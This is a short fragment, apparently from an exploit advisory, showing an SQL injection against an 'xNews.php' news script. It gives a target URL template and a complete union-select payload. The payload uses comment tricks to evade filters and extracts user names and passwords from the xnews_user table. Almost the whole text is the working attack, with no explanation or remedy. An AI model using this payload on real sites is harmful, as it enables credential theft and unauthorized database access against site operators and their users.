[[SQL]]]---------------------------------------------------------
http://[target]/[path]//xNews.php?act=shownews&id=[SQL]
Example:
//xNews.php?act=shownews&id=-1//union//select//0,1,concat(user_name,char(32),user_pass),3,4,5,6//from//xnews_user//where/**/id%20like%201/*
[[/SQL]]
"""""""""""""""""""""